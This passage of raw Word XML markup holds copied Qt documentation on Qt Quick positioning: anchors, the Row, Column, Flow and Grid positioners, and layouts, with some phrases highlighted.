          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2344" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2345" w:anchor="anchors.top-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors.top</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2346" w:anchor="anchors.bottom-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors.bottom</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, or setting</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2347" w:anchor="anchors.fill-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>anchors.fill</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as well as</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2348" w:anchor="width-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>width</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2349" w:anchor="height-prop" w:history="1">
        <w:r w:rsidRPr="00251D49">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>height</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>same applies when using positioners</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as Row and Grid, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>which may set the item's</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2350" w:anchor="x-prop" w:history="1">
        <w:r w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>x</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2351" w:anchor="y-prop" w:history="1">
        <w:r w:rsidRPr="00D1065E">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>y</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If you wish to change from using anchor-based to absolute positioning, you can clear an anchor value by setting it to</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>undefined</w:t>
      </w:r>
      <w:r w:rsidRPr="00251D49">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00251D49" w:rsidRDefault="00251D49" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="00D143AF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2352" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="00666090">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://doc.qt.io/qt-5/qtquick-positioning-layouts.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1981" w:name="_Toc483000959"/>
      <w:bookmarkStart w:id="1982" w:name="_Toc483003950"/>
      <w:bookmarkStart w:id="1983" w:name="_Toc483604302"/>
      <w:bookmarkStart w:id="1984" w:name="_Toc483605522"/>
      <w:r w:rsidRPr="00D1065E">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Item Positioners</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1981"/>
      <w:bookmarkEnd w:id="1982"/>
      <w:bookmarkEnd w:id="1983"/>
      <w:bookmarkEnd w:id="1984"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Positioner items are </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items that manage the positions of items in a declarative user interface. Positioners </w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>behave in a similar way to the</w:t>
      </w:r>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2353" w:history="1">
        <w:r w:rsidRPr="008B1DCE">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>layout managers</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">used with standard Qt widgets, </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>except</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> that they are also containers in their own right.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Positioners make it easier to work with many items when they need to be arranged in a </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regular layout</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2354" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Layouts</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">can also be used to arrange Qt Quick items in a user interface. They manage both the positions and the sizes of items on a declarative user interface, and are well </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>suited for resizable user interfaces</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1985" w:name="_Toc483000960"/>
      <w:bookmarkStart w:id="1986" w:name="_Toc483003951"/>
      <w:bookmarkStart w:id="1987" w:name="_Toc483604303"/>
      <w:bookmarkStart w:id="1988" w:name="_Toc483605523"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Positioners</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1985"/>
      <w:bookmarkEnd w:id="1986"/>
      <w:bookmarkEnd w:id="1987"/>
      <w:bookmarkEnd w:id="1988"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A set of standard positioners are provided in the basic set of Qt Quick graphical types:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="979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848"/>
        <w:gridCol w:w="6950"/>
      </w:tblGrid>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2355" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>LayoutMirroring</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Property used to mirror layout behavior</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2356" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Column</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Positions its children in a column</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2357" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Flow</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Positions its children side by side, wrapping as necessary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2358" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Grid</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="695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0B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B7D73">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Positions its children in grid formation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000B7D73" w:rsidRPr="002230B8" w:rsidTr="00D526D7">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0B7D73" w:rsidRPr="00C5685E" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId2359" w:history="1">
              <w:r w:rsidR="000B7D73" w:rsidRPr="00C5685E">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:u w:val="none"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Positioner</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
